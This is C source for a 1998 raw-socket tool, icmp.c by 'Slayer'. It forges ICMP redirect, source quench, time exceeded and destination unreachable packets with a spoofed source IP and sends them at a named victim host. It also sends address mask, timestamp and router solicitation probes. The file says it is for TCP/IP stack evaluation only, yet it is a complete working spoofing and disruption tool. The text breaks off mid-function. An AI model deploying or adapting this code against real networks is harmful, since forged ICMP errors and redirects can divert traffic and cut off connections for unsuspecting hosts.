/***************************************************************************/
/*                              I C M P . C                                */
/***************************************************************************/
/* - Program that allow to send the following ICMP packets:                */
/*    a) ICMP errors:                                                      */
/*      - Redirect.                                                        */
/*      - Source Quench.                                                   */
/*      - Time Exceeded.                                                   */
/*      - Destination Unreach.                                             */
/*    b) ICMP information:                                                 */
/*      - Address Mask Request. We can put a timeout to see the replies.   */
/*      - Timestamp Request. We can put a timeout to see the replies.      */ 
/*      - Information Request. We can put a timeout to see the replies.    */
/*      - Router Solicitation (Router Discovery). We can put a timeout to  */
/*                            see the replies. Under development, but I    */
/*                            think that can work. :)                      */ 
/*                                                                         */
/* - Must be included the first 64 bits of the original datagram that      */
/*   caused the ICMP error packet:                                         */
/*     Protocol(TCP|UDP), source port and destination port                 */
/*   or                                                                    */
/*     Protocol(ICMP), identifier and sequence number.                     */
/***************************************************************************/
/* Slayer - 1998                                            Version: 2.06  */
/***************************************************************************/
/* TODO:                                                                   */
/* - To include more protocols from the original IP datagram. OSPF?, IPIP? */
/*   SKIP? ...                                                             */
/* - More ICMP type packets.                                               */
/* - Use of configure (autoconf) & IP_HDRINCL ... some day :DD             */
/***************************************************************************/
/* Thanx to:                                                               */
/* My friends: Hades, Jfs, netsavage, sierra, wait_man, Shinji, synflood,  */
/* Lec, Dairo ... and more!                                                */
/* My girlfriend, Conchi, that becomes my principal reason to live on, and */
/* for Pep from Barcelona, the guy who introduce me to the "sockets world" */
/* years ago.                                                              */
/***************************************************************************/
/* IMPORTANT:                                                              */
/* I released this program for evaluation of TCP/IP stacks *ONLY*. Take it */
/* like a little tool to improve your system security, not for cracking,   */
/* disturbing or flooding another systems. This can be a crime on certain  */
/* countries.                                                              */
/***************************************************************************/
/* echo "Ideas & comments" | /bin/mail tcpbgp@softhome.net                 */
/* echo "Destructive opinions & flames" >> /dev/null                       */
/* sorry for the bad english. :)                                           */
/***************************************************************************/

#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <setjmp.h>

#include "compat.h"

/**********************************/
/* If U wanna see all the packets */
/* received by the socket then    */
/* uncomment the next line ... :) */
/**********************************/
//#define DEBUG

#define copymem( s, d, l)  memcpy( d, s, l)
#define iniciamem( d, l)  memset( d, 0, l)

#define MAX(x)  ( sizeof(x)/sizeof(x[0]) )

#ifdef SPANISH
#define LNG 0
  char *version="Versin 2.06 por Slayer - Noviembre - 1998.";
#else
#define LNG 1
  char *version="Version 2.06 by Slayer - November - 1998.";
#endif

#define LINE fprintf(stdout, \
     "-----------------------------------------------------\n")

char *cod_redirect[]={ "net",
                       "host",
                       "serv-net",
                       "serv-host"
                     };

char *cod_time[]={ "ttl",
                   "frag"
                 };
                                      
char *cod_unreach[]={ "net-unreach",  
                      "host-unreach", 
                      "prot-unreach",
                      "port-unreach",
                      "frag-needed",
                      "sroute-fail",
                      "net-unknown",
                      "host-unknown",
                      "host-isolated",
                      "net-ano",
                      "host-ano",
                      "net-unr-tos",
                      "host-unr-tos",
                      "com-admin-prohib",
                      "host-precedence-viol",
                      "precedence-cutoff"
                    };


char *mensaje_err[][2]= { 
{ "Programa finalizado satisfactoriamente",         "Program finished OK" },
{ "Error en nmero de argumentos",            "Wrong number of arguments" },
{ "Protocolo RAW desconocido",                     "Unknown RAW protocol" },
{ "No puedo crear socket tipo RAW",              "Can't make RAW sockets" },
{ "Tipo de paquete ICMP incorrecto",         "Incorrect ICMP packet type" },
{ "Gateway incorrecto",                                   "Wrong gateway" }, 
{ "Destino de ruta incorrecto",             "Incorrect route destination" }, 
{ "Cdigo de paquete ICMP incorrecto",       "Incorrect ICMP packet code" },
{ "Host original incorrecto",                       "Wrong original host" },
{ "Error enviando paquete",                  "Error while sending packet" },
{ "Protocolo todava no implementado",   "Protocol still not implemented" },
{ "Direccin IP o host de spoof incorrecto", "Wrong spoof IP or hostname" },
{ "No pude reservar memoria para unin data_hdr", 
                                   "Can't allocate union data_hdr memory" },
{ "Direccin IP o host vctima incorrecto", "Wrong victim IP or hostname" },
{ "Protocolo desconocido",                             "Unknown protocol" },
{ "No puedo crear socket de lectura RAW",    "Can't make read RAW socket" },
{ "Error leyendo socket RAW",            "Error while reading RAW socket" },
{ "Error al iniciar manejador de seal", 
                                "Error while initializing signal handler" }
                        };

char *prog;

#ifdef SOLARIS
extern char *sys_errlist;
#endif

#ifdef LINUX
extern int opterr;
#endif

/*****************/
/* Functions ... */
/*****************/
int existe_codigo( char *, char **, int );
int   existe_host( char *, u_long * );
int solaris_addr( char * );

int      envia_icmp( char *, u_long, u_long, int, u_long, u_short, u_short,
                     u_short, u_short, u_short, u_long );
int  envia_icmp_err( char *, u_long, u_long, int, u_long, u_short, u_short,
                     u_short, u_short );
int envia_icmp_info( char *, u_long, u_long, int, u_short, u_short,
                     u_short );
void       envia_ip( int, u_long, struct sockaddr_in *, int, int, int, int,
                     u_char * );

void            dont_print( struct in_addr, struct icmp2 * );
void      print_info_reply( struct in_addr, struct icmp2 * );
void print_timestamp_reply( struct in_addr, struct icmp2 * );
void   print_address_reply( struct in_addr, struct icmp2 * );
void    print_router_reply( struct in_addr, struct icmp2 * );

void  proto_tcp64( union data_hdr *, u_short, u_short );
void  proto_udp64( union data_hdr *, u_short, u_short );
void proto_icmp64( union data_hdr *, u_short, u_short );

void   envia_ip( int, u_long, struct sockaddr_in *, int, int, int, int,
                 u_char * );
void  read_icmp( int, char *, int );
void print_pack( char *, int, u_char, u_char, u_short, u_short );
void print_err_pack ( struct icmp2 * );
int    in_cksum( u_short *, int );
char *pasa( struct sockaddr_in * );
void      salir( int );
void salir_con_error( int );
void       help( void );
void timeout_func( int );
/********************/
/* ...end functions */
/********************/


/*************************/
/* Handle ICMP types ... */
/*************************/
struct icmp_class {
                    char *name;
                    int  class;
                    int  reply;
                    void (*print_packet)( struct in_addr, struct icmp2 *);
                  } icmp_info_or_err[]=
                  {
        "Echo Reply", ICMP_MESSAGE, NO_REPLY, dont_print,
        "Not implemented", 0, NO_REPLY, dont_print,
        "Not implemented", 0, NO_REPLY, dont_print,
        "Destination Unreach", ICMP_ERROR, NO_REPLY, dont_print,
        "Source Quench", ICMP_ERROR, NO_REPLY, dont_print,
        "Redirect", ICMP_ERROR, NO_REPLY, dont_print,
        "Not implemented", 0, NO_REPLY, dont_print,
        "Not implemented", 0, NO_REPLY, dont_print,
        "Echo Request", ICMP_MESSAGE, ICMP_ECHO_REPLY, dont_print,
        "Router Advertisement", ICMP_MESSAGE, NO_REPLY, print_router_reply,
        "Router Solicitation", ICMP_MESSAGE, ICMP_ROUTER_ADVERT, dont_print,
        "Time Exceeded", ICMP_ERROR, NO_REPLY, dont_print,
        "Parameter Problem", ICMP_ERROR, NO_REPLY, dont_print,
        "Timestamp Request", ICMP_MESSAGE, ICMP_TIMESTAMP_REPLY, dont_print,
        "Timestamp Reply", ICMP_MESSAGE, NO_REPLY, print_timestamp_reply,
        "Info Request", ICMP_MESSAGE, ICMP_INFO_REPLY, dont_print,
        "Info Reply", ICMP_MESSAGE, NO_REPLY, print_info_reply,
        "Address Mask Request", ICMP_MESSAGE, ICMP_ADDRESS_REPLY, dont_print,
        "Address Mask Reply", ICMP_MESSAGE, NO_REPLY, print_address_reply
                  };



/***********************************/
/* Access to 64 bits protocol data */
/* to build an ICMP error packet.  */
/***********************************/
struct protocols {
                    int proto;
                    void (*func_proto)( union data_hdr *, u_short, u_short );
                 } data_protocols[] = {
                                        IPPROTO_TCP,  proto_tcp64,
                                        IPPROTO_UDP,  proto_udp64,
                                        IPPROTO_ICMP, proto_icmp64,
                                       }; 


/**************************************************/
/* Nasty initial function (sorry). Filter the     */
/* arguments. Return 0 if success, another number */
/* (From 1 to 17) if an error occurs. Take a look */
/* into the error messages array.                 */
/**************************************************/
int main(int argc, char **argv)
{
  char **array_aux, buf[1500];
  int  c, tipo_icmp, cod_icmp, max_cod, sock, sock_lec, tam_icmp, 
      tam_sock_buf = 1024 * 50, timeout = 0;
  u_short p_origen, p_destino, proc_id;
  u_long gway=0, dest_red=0, orig=0, ip_spoof=0, maskaddr=0;
  struct protoent *proto;
  struct sockaddr_in victima;
  
  iniciamem( (char *)&victima, sizeof(struct sockaddr_in) );
  iniciamem( buf, sizeof(buf) );

  prog = argv[0];
  proc_id = getpid();

  if ( argc == 1 )
  {
     help();
  }

  if ( argc > 11 )
  {
     salir(1);
  }

  opterr=0;
  while ( (c = getopt( argc, argv, "hvdsrtmpiy")) != EOF)
  {
     switch (c)
     {
        case 'h': help();
        case 'v': fprintf(stdout, "%s - %s\n",argv[0], version);
                  exit(0);
        case 'd': if ( (argc == 8) || (argc == 9) )
                  {
                     tipo_icmp = ICMP_DEST_UNREACH;
                     array_aux = cod_unreach;
                     max_cod = MAX(cod_unreach);
                     p_origen = atoi(argv[6]);
                     p_destino = atoi(argv[7]);
                  }
                  else  salir(1);
                  break;
        case 's': if ( (argc == 7) || (argc == 8) )
                  {
                     tipo_icmp = ICMP_SOURCE_QUENCH;
                     cod_icmp = 0;
                     p_origen = atoi(argv[5]);
                     p_destino = atoi(argv[6]);
                  }
                  else  salir(1);
                  break;
        case 'r': if ( argc == 10 )
                  {
                     tipo_icmp = ICMP_REDIRECT;
                     array_aux = cod_redirect;
                     max_cod = MAX(cod_redirect);
                     p_origen = atoi(argv[8]);
                     p_destino = atoi(argv[9]);
                  }
                  else  salir(1);
                  break;
        case 't': if ( (argc == 8) || (argc == 9) )
                  {
                     tipo_icmp = ICMP_TIME_EXCEEDED;
                     array_aux = cod_time;
                     max_cod = MAX(cod_time);
                     p_origen = atoi(argv[6]);
                     p_destino = atoi(argv[7]);
                  }
                  else  salir(1);
                  break;
        case 'm': if ( (argc == 4) || (argc == 5) )
                  {
                     tipo_icmp = ICMP_ADDRESS;
                     cod_icmp = 0;
                     if ( argc == 4 )
                        timeout = TIMEOUT_DFL;
                     else
                        timeout = atoi(argv[4]);
                  }
                  else  salir(1);
                  break;
        case 'p': if ( (argc == 4) || (argc == 5) )
                  {
                     tipo_icmp = ICMP_TIMESTAMP;
                     cod_icmp = 0;
                     if ( argc == 4 )
                        timeout = TIMEOUT_DFL;
                     else
                        timeout = atoi(argv[4]);
                  }
                  else  salir(1);
                  break;
        case 'i': if ( (argc == 4) || (argc == 5) )
                  {
                     tipo_icmp = ICMP_INFO_REQUEST;
                     cod_icmp = 0;
                     if ( argc == 4 )
                        timeout = TIMEOUT_DFL;
                     else
                        timeout = atoi(argv[4]);
                  }
                  else  salir(1);
                  break;                  
        case 'y': if ( (argc == 4) || (argc == 5) )
                  {
                     tipo_icmp = ICMP_ROUTER_SOLICIT;
                     cod_icmp = 0;
                     if ( argc == 4 )
                        timeout = TIMEOUT_DFL;
                     else
                        timeout = atoi(argv[4]);
                  }
                  else  salir(1);
                  break;                  
        default : salir(4);
                  break;
     }
  }

  if ( argc == 2 ) 
  {
     salir(1);
  }

  if ( ( proto = getprotobyname("raw")) == NULL )
  {
     salir(2);
  }

    /* Socket RAW for the RAW protocol ... */

  sock = socket( AF_INET, SOCK_RAW, proto->p_proto);
  
  if ( sock < 0 )
  {
     salir_con_error(3);
  }

  if ( existe_host( argv[2], &ip_spoof ) ) /* Wrong IP spoof */
     salir(11);

  if ( existe_host(argv[3], (u_long *)&victima.sin_addr.s_addr) )
     salir(13);     

  if ( tipo_icmp == ICMP_REDIRECT )
  {
     if ( (proto = getprotobyname(argv[7])) == NULL )
     {
        salir(14);
     }
     if ( existe_host( argv[4], &gway ) ) /* Wrong Gateway */
          salir(5);

     if ( existe_host( argv[5], &dest_red ) ) /* Wrong Destination*/
          salir(6);

     if ((cod_icmp = existe_codigo(argv[6], array_aux, max_cod)) == -1)
          salir(7);  /* Wrong Redirect code */
        
     orig = victima.sin_addr.s_addr;

  } /* Redirect end */
  else
  {
     if ( icmp_info_or_err[tipo_icmp].class )  /* ICMP error ... */
     {
       dest_red = victima.sin_addr.s_addr;
        
       if ( tipo_icmp != ICMP_SOURCE_QUENCH )
       {
          if ((cod_icmp = existe_codigo(argv[4], array_aux, max_cod)) == -1)
              salir(7);  /* Wrong ICMP code */
     
          if ( (proto = getprotobyname(argv[5])) == NULL )
          {
              salir(14);
          }
     
          if ( argc == 9 )
          {
             if ( existe_host( argv[8], &orig ) ) 
                salir(8);                      /* Wrong original Host */
          }
          else                 /* Si no se proporciona host destino original */
             orig = ip_spoof;  /* le metemos el ip_spoof */
       }
       else // It's not an ICMP error, it's an ICMP information message ...
       {
          if ( (proto = getprotobyname(argv[4])) == NULL )
          {
             salir(14);
          }

          if ( argc == 8 )
          {
             if ( existe_host( argv[7], &orig ) ) 
                salir(8);                      /* Wrong original Host */
          }
          else                 /* Si no se proporciona host destino original */
             orig = ip_spoof;   /* le metemos el ip_spoof */
       }
     }
     else /* It's not an ICMP error ...           */
     {    /* It's an ICMP information message ... */
          /* Creation of read RAW socket ...      */
        sock_lec = socket( AF_INET, SOCK_RAW, IPPROTO_ICMP );
        if ( sock_lec < 0 )
        {
           salir_con_error(15);
        }
        /* Grows the socket receive buffer ... */
        setsockopt( sock_lec, SOL_SOCKET, SO_RCVBUF, (char *)&tam_sock_buf,
                    sizeof(tam_sock_buf) );
        setsockopt( sock_lec, SOL_SOCKET, SO_BROADCAST, (char *)&tam_sock_buf,
                    sizeof(tam_sock_buf) );
     }
  }

  tam_icmp = envia_icmp( buf, gway, dest_red, cod_icmp, orig, tipo_icmp,
              proto->p_proto, p_origen, p_destino, proc_id, maskaddr );
  
  envia_ip( sock, ip_spoof, (struct sockaddr_in *)&victima, TTL_DFL,
           ICMP_ERR_DFL_TOS, IPPROTO_ICMP, tam_icmp, buf );

#ifdef SPANISH            
  fprintf(stdout,"Paquete ICMP %s enviado a %s\n", icmp_info_or_err[tipo_icmp].name,
          argv[3]);
#else
  fprintf(stdout,"ICMP %s packet sent to %s\n", icmp_info_or_err[tipo_icmp].name,
          argv[3]);
#endif

  if ( !icmp_info_or_err[tipo_icmp].class && timeout )  /* ICMP message ... */
  {
#ifdef SPANISH
     fprintf(stdout, "\nRecibiendo respuestas ICMP ...\n");
#else
     fprintf(stdout, "\nReceiving ICMP replies ...\n");
#endif
     read_icmp( sock_lec, buf, timeout );
  } 
  salir(0);
}


/**********************************/
/* Look for code of the ICMP type */
/* into the array_cod.            */
/* Return -1 on error, or return  */
/* the code value on success.     */
/**********************************/
int existe_codigo( char *cod, char **array_cod, int max_cod )
{
  short int bucle;
  
  for (bucle=0; bucle <= (max_cod-1); bucle++)
     if ( !strcmp( cod, array_cod[bucle]) )
        return bucle;
      
  return -1;  
}



/********************************************/
/* If nom_host == NULL then we want to know */
/* if the IP (in binary format) its ok.     */
/* If nom_host != NULL then we put the      */
/* IP of nom_host into bin_host.            */
/* Return 1 on error, 0 on succes.          */
/********************************************/
/* We allow the 255.255.255.255 address     */
/********************************************/
int existe_host( char *nom_host, u_long *bin_host )
{
  struct hostent *hinfo;
  struct sockaddr_in host_tmp;
  struct in_addr host_binario;
    
  iniciamem( (char *)&host_tmp, sizeof(host_tmp) );
  iniciamem( (char *)&host_binario, sizeof(host_binario) );

  host_tmp.sin_family = AF_INET;
  
  if ( nom_host == NULL )   /* We wanna know if the binary IP its  OK. */
  {
     if ( hinfo = gethostbyaddr( (char *)bin_host, 4, AF_INET ) )
        return 0;
     else
        return 1;
  }  
 
  if ( inet_aton( nom_host, &host_binario) )
  {
     copymem( (char *)&host_binario, (char *)bin_host, sizeof(host_binario));
     return (solaris_addr( nom_host )); // It's not OK but what can I do ? :( 
  }

  if ( hinfo = gethostbyname( nom_host ) ) /* Put nom_host into bin_host */
  {
     copymem(hinfo->h_addr, (char *)&host_tmp.sin_addr, hinfo->h_length);
     copymem( (char *) &host_tmp.sin_addr.s_addr, (char *)bin_host, sizeof( host_tmp.sin_addr.s_addr));
     return 0;
  }

  return 1;
}




/**************************************/
/* Why Solaris makes so difficult the */
/* handling of inet_aton? I don't     */
/* know :(                            */
/* Return 0 on success                */
/* Return 1 on error                  */
/**************************************/
int solaris_addr( char *nom_host )
{
   char *puntero, *ip_byte, str_aux[16];

   iniciamem(str_aux, sizeof(str_aux)); 
 
   if ( strlen(nom_host) > (sizeof(str_aux)-1) )
      return 1;

   strcpy( str_aux, nom_host);

   puntero = str_aux;

   while ( (ip_byte = strtok( puntero, ".")) != NULL )
   {
      if ( atol(ip_byte) > 255 )
         return 1;
      puntero = NULL; 
   }
   return 0;
}


/***************************************/
/* Go to the ICMP error function or to */
/* the ICMP information function.      */
/***************************************/
int envia_icmp( char *buffer, u_long gate, u_long dest, int code, u_long org,
                u_short tipo, u_short prot, u_short porto, u_short portd, 
                u_short proc_id, u_long maskaddr )
{
  if ( icmp_info_or_err[tipo].class )  /* ICMP error ... */
      return( envia_icmp_err ( buffer, gate, dest, code, org, tipo, prot,
                               porto, portd ) );

          /* ICMP message ...  */
  return( envia_icmp_info( buffer, dest, maskaddr, code, tipo, proc_id, 0xFF ));
}


/*********************************************/
/* Build an ICMP information packet into the */
/* address 'buffer'                          */
/* Return the packet length in bytes.        */
/*********************************************/
int envia_icmp_info( char *buffer, u_long dest, u_long mask, int code,
                    u_short tipo, u_short id, u_short seqnum )
{
  struct timeval tiempo;
  int tam = TCAB_ICMP_MSG;
  struct icmp2 *icp = (struct icmp2 *) buffer;
  
  icp->icmp_type   = tipo;
  icp->icmp_code   = code;
  icp->icmp_cksum  = 0;

  icp->icmp_id = id;
  icp->icmp_seq = seqnum;

  switch ( tipo )
  {
     case ICMP_TIMESTAMP: gettimeofday( (struct timeval *) &tiempo, NULL);
          icp->icmp_otime = htonl((tiempo.tv_sec%86400) * 1000 // From secs...
                            +                                  // to milisecs
                         tiempo.tv_usec / 1000); // From microsecs to milisecs
                          icp->icmp_rtime = 0; 
                          icp->icmp_ttime = 0; 
                          tam += TDATA_TIMESTAMP;
                          break;
     case ICMP_INFO_REQUEST: 
                            break;
     case ICMP_ADDRESS: icp->icmp_mask = htonl(mask);
                        tam += TDATA_ADDRESS;
                        break;
     case ICMP_ROUTER_SOLICIT: icp->icmp_reserved = 0;
                               break;
     default: /* :) */
             break;
  }
  
  icp->icmp_cksum = in_cksum( (u_short *)icp, tam );
  
  return( tam );
}


/*******************************************************/
/* Build an ICMP error packet into the address 'buffer'*/
/* Also make the IP header and the 64 data bits of the */
/* original datagram.                                  */
/* Return the packet length in bytes.                  */
/*******************************************************/
int envia_icmp_err ( char *buffer, u_long gate, u_long dest, int code,
                     u_long org, u_short tipo, u_short prot, u_short porto,
                     u_short portd )
{
  struct icmp2 *icp = (struct icmp2 *) buffer;
  union data_hdr *mix = (union data_hdr *) malloc(TCAB_64DATA);
  int elemento;
  
  if ( !mix )
      salir(12);

  iniciamem( mix, TCAB_64DATA);
  
  icp->icmp_type   = tipo;
  icp->icmp_code   = code;
  icp->icmp_cksum  = 0;

  icp->icmp_gwaddr.s_addr = gate;
  
  icp->icmp_ip.ip_hl  = TCAB_IP >> 2;
  icp->icmp_ip.ip_v   = 4;
  icp->icmp_ip.ip_tos = 0x0000;
  icp->icmp_ip.ip_len = htons( TCAB_IP + TCAB_ICMP + TCAB_64DATA);
  icp->icmp_ip.ip_id  = htons(0x4A2F);
  icp->icmp_ip.ip_off = 0x0000;
  icp->icmp_ip.ip_ttl = TTL_DFL;
  icp->icmp_ip.ip_p   = prot;
  icp->icmp_ip.ip_sum = 0x0000;
  
  if ( tipo != ICMP_REDIRECT )
  {
     icp->icmp_ip.ip_src.s_addr = dest;
     icp->icmp_ip.ip_dst.s_addr = org;
  }
  else
  {
     icp->icmp_ip.ip_src.s_addr = org;
     icp->icmp_ip.ip_dst.s_addr = dest;
  }

  icp->icmp_ip.ip_sum = in_cksum( (u_short *)(&(icp->icmp_ip)), TCAB_IP );
  
  for ( elemento=0; elemento < MAX(data_protocols); elemento++ )
  {
     if ( prot == data_protocols[elemento].proto )
     {
        (*data_protocols[elemento].func_proto)( mix, porto, portd);
        elemento=32767;
        break;
     }
  }
  
  if ( elemento != 32767)
     salir(10);

  copymem( mix, icp + 1, TCAB_64DATA ); 
  
  icp->icmp_cksum = in_cksum( (u_short *)icp, TCAB_ICMP + TCAB_64DATA );

  return( TCAB_ICMP + TCAB_64DATA );
}


void proto_tcp64( union data_hdr *mix, u_short porto, u_short portd)
{
   mix->cab_tcp.source = htons(porto);      /* Source port         */
   mix->cab_tcp.dest   = htons(portd);      /* Destination port    */
   mix->cab_tcp.seq    = htonl(0xC010C005); /* TCP sequence number */
}

void proto_udp64( union data_hdr *mix, u_short porto, u_short portd )
{
   mix->cab_udp.source  = htons(porto);  /* Source port      */
   mix->cab_udp.dest    = htons(portd);  /* Destination port */
   mix->cab_udp.uh_ulen = htons(12);     /* Length           */
   mix->cab_udp.uh_sum  = htons(0xFA13); /* Checksum         */
}

void proto_icmp64( union data_hdr *mix, u_short identif, u_short num_seq )
{
   mix->cab_echo.type  = ICMP_ECHO;
   mix->cab_echo.code  = 0x0;        /* Echo Request                 */
   mix->cab_echo.cksum = 0x0000;     /* Checksum                     */
   mix->cab_echo.id    = identif;    /* Echo Request ID              */
   mix->cab_echo.seq   = num_seq;    /* Echo Request sequence number */
   mix->cab_echo.cksum = in_cksum( (u_short *)mix, TCAB_64DATA );
}


/******************************************/
/* Build an IP datagram adding the data   */
/* 'paquete' and sending it to the socket */
/* 's'.                                   */
/* No value return.                       */
/******************************************/
void envia_ip( int s, u_long orig, struct sockaddr_in *vict, int ttl, int tos,
               int prot, int len, u_char *paquete )
{
  int n;
  char buf_ip[1500];
  struct ip2 *ip_p = (struct ip2 *) buf_ip;
  
  iniciamem( buf_ip, 1500 );
  
  ip_p->ip_hl  = TCAB_IP >> 2;
  ip_p->ip_v   = 4;
  ip_p->ip_tos = tos;
  ip_p->ip_len = htons(TCAB_IP + len); 
  ip_p->ip_id  = htons(0x4444);
  ip_p->ip_off = 0x0000;
  ip_p->ip_ttl = ttl;
  ip_p->ip_p   = prot;      
  ip_p->ip_sum = 0x0000;
  ip_p->ip_src.s_addr = orig;
  ip_p->ip_dst.s_addr = vict->sin_addr.s_addr;

/* If you want to calculate the IP header checksum
 * you must delete the comments of the next line
 * because the Linux kernel fill in automatically:
 *
 *  ip_p->ip_sum = in_cksum( (u_short *)ip_p, TCAB_IP );   */

  copymem( paquete, ip_p + 1, len); /* Copy the ICMP header ... */

  n = sendto( s, buf_ip, ntohs(ip_p->ip_len), 0, (struct sockaddr *)vict,
              sizeof(struct sockaddr_in) );

  if ( n < 0 )
  {
     salir_con_error(9);
  }
  
  if ( n != ntohs(ip_p->ip_len) )
#ifdef SPANISH
      fprintf(stderr,"!!Cuidado!! --> Bytes enviados = %d\n",n);
#else
      fprintf(stderr,"Warning!! --> Bytes sent = %d\n",n);
#endif
}


/**********************************************/
/* Read ICMP packets sent from the kernel ... */
/**********************************************/
sigjmp_buf myjmp;
void read_icmp( int sock_lec, char *buf_snd, int timeout )
{
  u_short seqnum, id;
  char buf_rcv[1500];
  sigset_t mysignal_set;
  struct sockaddr origen;
  struct icmp2 *icp = (struct icmp2 *) buf_snd;
  int n, tam = sizeof(struct sockaddr);

  sigemptyset( &mysignal_set );
  sigaddset( &mysignal_set, SIGALRM );
  
  if ( signal( SIGALRM, timeout_func ) == SIG_ERR )
     salir(17);

  alarm( timeout );  

  for ( ; ; )  
  {
     if ( sigsetjmp(myjmp, 1) != 0 )
        break;
     iniciamem( buf_rcv, 1500 );

     sigprocmask(SIG_UNBLOCK, &mysignal_set, NULL); /* Unblock ... */
     n = recvfrom( sock_lec, buf_rcv, sizeof(buf_rcv), 0,
                   &origen, &tam);
     sigprocmask(SIG_BLOCK, &mysignal_set, NULL);  /* ... Block */
     
     if ( n < 0 )
          salir(16);   /* recvfrom error */

     print_pack( buf_rcv, n, icp->icmp_type, icp->icmp_code, icp->icmp_id, 
                 icp->icmp_seq );
  }
}


/**************************************************/
/* Print an ICMP packet received from the kernel  */
/**************************************************/
void print_pack( char *buf_rcv, int n, u_char type, u_char code, u_short id,
                u_short seqnum )
{
  struct icmp2 *icmp_rcv;

  struct ip2 *ip = (struct ip2 *) buf_rcv;

  icmp_rcv = (struct icmp2 *)((char *)ip + (ip->ip_hl << 2) );

  if ( (icmp_rcv->icmp_type > MAX(icmp_info_or_err) )
      || 
       (icmp_rcv->icmp_type != (icmp_info_or_err[type].reply) ) 
     )
  {
#ifdef DEBUG
     LINE;
     fprintf(stdout, "%s ...\n", inet_ntoa(ip->ip_src));
     print_err_pack( icmp_rcv );
     LINE;
#endif /* End DEBUG */
     return;
  }

  if ( icmp_rcv->icmp_type != ICMP_ROUTER_ADVERT )
  {
     if ( icmp_rcv->icmp_id != id ) /* Control of ID and Seq can't be made */
     {                              /* into an ICMP ROUTER ADVERTISMENT    */ 
         LINE;
#ifdef SPANISH
        fprintf(stdout, "%-15s -> Id de ICMP incorrecto...\n",
                inet_ntoa(ip->ip_src) );
#else
        fprintf(stdout, "%-15s -> Wrong ICMP Id...\n",
             inet_ntoa(ip->ip_src) );
#endif

#ifdef DEBUG
        print_err_pack ( icmp_rcv );
#endif
        LINE;
        return; 
     }

     if ( icmp_rcv->icmp_seq != seqnum )
     { 
        LINE;
#ifdef SPANISH
        fprintf(stdout,"%-15s -> Nmero de secuencia incorrecto...\n",
             inet_ntoa(ip->ip_src));
#else
        fprintf(stdout,"%-15s -> Incorrect Sequence number...\n",
             inet_ntoa(ip->ip_src));
#endif

#ifdef DEBUG
        print_err_pack( icmp_rcv );
#endif
        LINE;
        return;
     }
  }
     /* Go to the appropriate ICMP print reply function ...*/ 
  (*icmp_info_or_err[icmp_rcv->icmp_type].print_packet)
                                                     ( ip->ip_src, icmp_rcv );
}


void dont_print( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
#ifdef SPANISH
   fprintf(stdout, "%-15s (%s 0x%X) -> Comorrl? No es posible\n",
                   inet_ntoa(ip_src),
                   icmp_info_or_err[icmp_rcv->icmp_type].name,
                   icmp_rcv->icmp_type);
#else
   fprintf(stdout, "%-15s (%s 0x%X) -> Uuuu? Not possible\n",
                   inet_ntoa(ip_src),
                   icmp_info_or_err[icmp_rcv->icmp_type].name,
                   icmp_rcv->icmp_type);
#endif
}


/***********************************/
/* Print an ICMP Info Reply packet */
/***********************************/
void print_info_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
   fprintf(stdout, "%-15s -> %s\n", inet_ntoa(ip_src),
                   icmp_info_or_err[icmp_rcv->icmp_type].name);
}


/*****************************************/
/* Print an ICMP Time stamp Reply packet */
/*****************************************/
void print_timestamp_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
   struct tm *tiempo;
   u_long aux_temp;

   fprintf(stdout, "%-15s -> %s\n", inet_ntoa(ip_src),
              icmp_info_or_err[icmp_rcv->icmp_type].name);

      /* Time when our request was sent by us ... */
   aux_temp = ntohl(icmp_rcv->icmp_otime)/1000;
   tiempo = localtime((time_t *)&aux_temp);
#ifdef SPANISH
   fprintf(stdout, "                      Hora Original = %.2d:%.2d:%.2d\n",
                  tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#else
   fprintf(stdout, "                     Original Time = %.2d:%.2d:%.2d\n",
                  tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#endif

      /* Time when this reply was received by the dest ... */
   aux_temp = ntohl(icmp_rcv->icmp_rtime)/1000;
   tiempo = localtime((time_t *)&aux_temp);
#ifdef SPANISH   
   fprintf(stdout, "                     Hora Recepcin = %.2d:%.2d:%.2d\n",
                  tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#else
   fprintf(stdout, "                     Received Time = %.2d:%.2d:%.2d\n",
                  tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#endif

      /* Time when this reply was sent by the dest ... */
   aux_temp = ntohl(icmp_rcv->icmp_ttime)/1000;
   tiempo = localtime((time_t *)&aux_temp);
#ifdef SPANISH
   fprintf(stdout, "                   Hora Transmisin = %.2d:%.2d:%.2d\n",
                  tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#else
   fprintf(stdout, "                   Transmited Time = %.2d:%.2d:%.2d\n",
                  tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#endif                  
}


/*******************************************/
/* Print an ICMP Address Mask Reply packet */
/*******************************************/
void print_address_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
   struct in_addr mascara;

   fprintf(stdout, "%-15s -> %s\n", inet_ntoa(ip_src),
                    icmp_info_or_err[icmp_rcv->icmp_type].name);
   mascara.s_addr = icmp_rcv->icmp_mask;
   fprintf(stdout, "                   mask = %s\n", inet_ntoa( mascara ) );
}


/*********************************************/
/* Print an ICMP Router Advertisement packet */
/* Still under development! but I think that */
/* can work. ;)                              */
/*********************************************/
void print_router_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
   int entry;
   struct id_rdiscovery *data_rdisc;

   fprintf(stdout, "%-15s -> %s\n", inet_ntoa(ip_src),
                    icmp_info_or_err[icmp_rcv->icmp_type].name);
#ifdef SPANISH
   fprintf(stdout, "              Lifetime = %d segundos\n",
                   ntohs(icmp_rcv->icmp_lifetime));
   fprintf(stdout, "    Nmero direcciones = 0x%X %d\n",
                   icmp_rcv->icmp_num_addr);
   fprintf(stdout, "        Tamao entrada = 0x%X %d\n",
                   icmp_rcv->icmp_addr_entry_size);
#else                    
   fprintf(stdout, "              Lifetime = %d seconds\n",
                    ntohs(icmp_rcv->icmp_lifetime));
   fprintf(stdout, "             Num addrs = 0x%X %d\n",
                    icmp_rcv->icmp_num_addr);
